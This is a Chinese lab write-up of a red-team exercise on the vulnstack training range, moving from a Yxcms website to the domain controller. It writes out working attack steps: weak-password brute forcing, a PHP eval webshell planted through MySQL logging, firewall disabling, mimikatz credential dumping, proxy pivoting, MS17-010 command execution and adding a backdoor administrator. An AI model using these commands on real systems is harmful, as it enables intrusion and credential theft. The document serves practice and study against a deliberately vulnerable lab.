目錄

環境搭建

web打點

Yxcms漏洞getshell

phpmyadmin后臺getshell

1. into outfile寫入webshell

2.?開啟全局日志getshell

???????3. phpMyAdmin 4.8.x 本地文件包含getshell

橫向滲透

關閉防護墻

權限提升

域內信息收集

導出憑證

添加自動路由與sock4代理

ms17-010掃描

---

vlunstack是紅日安全團隊出品的一個實戰環境，具體介紹及靶機環境下載地址請訪問：http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

記錄自己第一次玩內網靶機，是真的菜！這篇重點在于學習思路，而不是拿域控。

環境搭建

• win7 web服務器雙網卡（nat , vm2）。192.168.110.138、192.168.52.140
• win2013 域成員（vm2） 192.158.52.141
• win2018 域控 （vm2）192.168.52.138?

進入win7后進入c盤找到phpstudy開啟web服務，三臺主機防火墻都默認開啟。環境準備工作完成

web打點

首先先進行簡單信息收集。web地址為?http://192.168.110.138/yxcms/

1. 端口掃描

開放80，135，3306端口

2.??敏感目錄掃描

如下，發現很多敏感文件

3. cms識別

根據網站的表顯示，我們發現網站使用的是YXCMS進行搭建

根據這些信息，我們可以從以下幾點去突破目標站點

• mysql端口
• phpmyadmin
• cms漏洞

Yxcms漏洞getshell

現在只知道使用了yxcms這個框架，但是我們并不知道具體的版本。所以現在得找到具體版本，然后找到這個版本是否存在漏洞。現在思路有兩個，一從網頁中尋找有沒有泄露版本號的地方或者文件。二我們在敏感目錄掃描時發現了網站備份文件

?下載后，發現其中有個升級日志，顯示版本為1.2.1

現在思路又有兩個，自己審計一波源碼或者百度yxcms 1.2.1漏洞。我這里就百度，發現后臺存在一個任意文件寫入漏洞。所以找到后臺

弱口令爆破，出來了 admin/123456（真實環境中弱口令也很多）。進入管理后臺，找漏洞位置：全局設置—前臺模板—管理模板文件—右上角新建

上傳webshell

連接

http://192.168.110.138/yxcms/protected/apps/default/view/default/shell.php

此時呢，我們先不往下進行，既然是靶機，我們就應該多去嘗試一下發掘它其他的漏洞

phpmyadmin后臺getshell

使用專門的phpmyadmin口令爆破工具進行爆破 ——》phpMyAdmin多線程破解工具 | Luckysec

?獲取到賬號密碼 root root。phpmyadmin后臺getshell一般有以下幾種方式：

1、select into outfile直接寫入
2、開啟全局日志getshell
3、使用慢查詢日志getsehll
4、使用錯誤日志getshell
5、利用phpmyadmin4.8.x本地文件包含漏洞getshell

1. into outfile寫入webshell

關于into outfile可詳看——>?sql注入getshell的幾種方式_辰辰啊-CSDN博客_sql注入getshell

當secure_file_priv的值為null ，表示限制mysqld 不允許導入|導出

所以這種方法在這里不行?

2.?開啟全局日志getshell

mysql 5.0版本以上會創建日志文件，修改日志的全局變量，也可以getshell。但是也要對生成的日志有可讀可寫的權限。

首先，介紹兩個MySQL全局變量（general_log、general_log file）

• general log 指定日志保存狀態，一共有兩個值（ON/OFF）ON代表開啟 OFF代表關閉。
• general log file 指的是日志的保存路徑

（1）查看配置

show variables like '%general%';

???

（2）開啟general log模式

set global general_log = on;

?此時再查看變為on

（3）設置日志目錄為shell地址

一開始目錄掃描的時候發現了phpinfo.php文件，我們搜索“DOCUMENT_ROOT”獲取網站根目錄

這里shell的目錄地址需要有可寫權限，如果沒反應沒有生成該文件說明沒寫權限寫不進去

set global general_log_file = 'C:/phpStudy/WWW/yxcms/rizhi.php'

再次查看配置，設置成功

??

?（4）寫入shell

如果寫入進去但是連接不了，可能是函數不支持，可以換成別的函數如assert等

select '<?php @eval($_POST["a"]); ?>'

使用蟻劍進行連接密碼 a

???????3. phpMyAdmin 4.8.x 本地文件包含getshell

可參考 ：phpMyAdmin 4.8.x 本地文件包含漏洞利用 - Hookjoy - 博客園

關于打點就先說這么多，接下來進入到內網環境

橫向滲透

發現當前是管理員用戶

關閉防護墻

1. 查看防火墻狀態是打開的

netsh advfirewall show allprofiles

?2. 關閉防火墻

netsh advfirewall set allprofiles state off

這里我們，使用?msfvenom生成后門程序及利用_辰辰啊-CSDN博客?。然后使用冰蝎將exe程序上傳，切換到虛擬終端使用命令行，start 程序名.exe?運行可執行程序。不建議直接反彈shell給msf，因為會導致一些命令不能使用。這里用的kali的msf，我用真實機的msf進行監聽就獲取不到shell，關閉防火墻也不行！不知道為啥

權限提升

成功提升為system權限（實戰中可能需要其他更復雜的方式進行提權）

域內信息收集

msf查看主機信息的時候可能會亂碼 ——>msf拿到windows的shell顯示亂碼解決方法_Websec-CSDN博客

直接輸入 chcp?65001 這條語句即可解決

（1）查看是否存在域

使用systeminfo 命令,查看是否存在域.如果域顯示為 WORKGROUP，表示當前服務器不在域內。有則顯示域名;

systeminfo

如下顯示存在域 god.org?

?（2）判斷主域

一般域服務器都會同時作為時間服務器,所以使用下面命令判斷主域

• net time /domain? ? ? ? ? ? ?

? ? ? ?1. 存在域，但是當前用戶不是域用戶（顯示拒絕訪問）

? ? ? ?2. 存在域，當前用戶是域用戶（顯示當前時間）

? ? ? ?3. 不存在域 （提示找不到域）

?

（3）查詢網卡信息

ipconfig /all?

?顯示當前有兩塊網卡

• 192.168.52.143
• 192.168.110.138

接著ping一下 god.org

經過一番信息收集，我們可以知道域控的地址為：192.168.52.138。當前域成員機的地址為??192.168.52.143

導出憑證

我們可以使用run hashdump進行憑證導出，但是獲取不到明文。所以這里使用mimikatz，關于mimikatz的使用_辰辰啊-CSDN博客

我們先把mimitakz（實戰中需要免殺處理）上傳上去：

upload /root/tools/mimikatz.exe C:\downsoft\mini.exe

?

?進入shell運行

獲取到了明文密碼為123.com 。接著可以遠程登錄

添加自動路由與sock4代理

（1）添加自動路由，關于 ——>?內網滲透之自動路由

meterpreter > run post/multi/manage/autoroute

?（2）添加sock4代理

詳看 ——>?內網滲透之使用ProxyChains進行代理掃描

添加代理后進行存活主機探測

探測 192.168.52.0/24 網段的主機

proxychains nmap -sn -PE -T5 192.168.52.0/24 | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'

?探測 192.168.110.0/24 網段的主機

所以綜上排除后

192.168.110.0/24網段ip只有一個就是被拿下的機器

192.168.52.0/24網段主機除了自己本身還有138和141

對141進行端口掃描

對138進行端口掃描，顯示所有端口都關閉

ms17-010掃描

因為目標為2003，其他的payload都不成功那只能執行系統命令了，直接開啟3389

msf5 > use auxiliary/admin/smb/ms17_010_command msf5 > set command "wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1" msf5 > set rhosts x.x.x.x

再次執行命令3389端口已開啟

接著繼續執行添加用戶的命令

• net user heike admin@1234 /add? ? ? 新建用戶
• net user? ? ? ? ?查看用戶
• set command net localgroup administrators heike /add? ? 用戶添加進管理員
• net localgroup administrators? ? ? 查看管理員組成員

?開啟遠程桌面

rdesktop -u heike -p admin@1234 192.168.52.141

win2003已經拿下了，現在攻擊域控，同樣域控也可以使用17-011獲取權限

msf5 > use auxiliary/admin/smb/ms17_010_command msf5 > set command "wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1" msf5 > set command netsh advfirewall set allprofiles state off #關閉防火墻

?然后再添加用戶，遠程桌面連接，連接成功

總結

以上是生活随笔為你收集整理的从外网到域控（vulnstack靶机实战一）的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。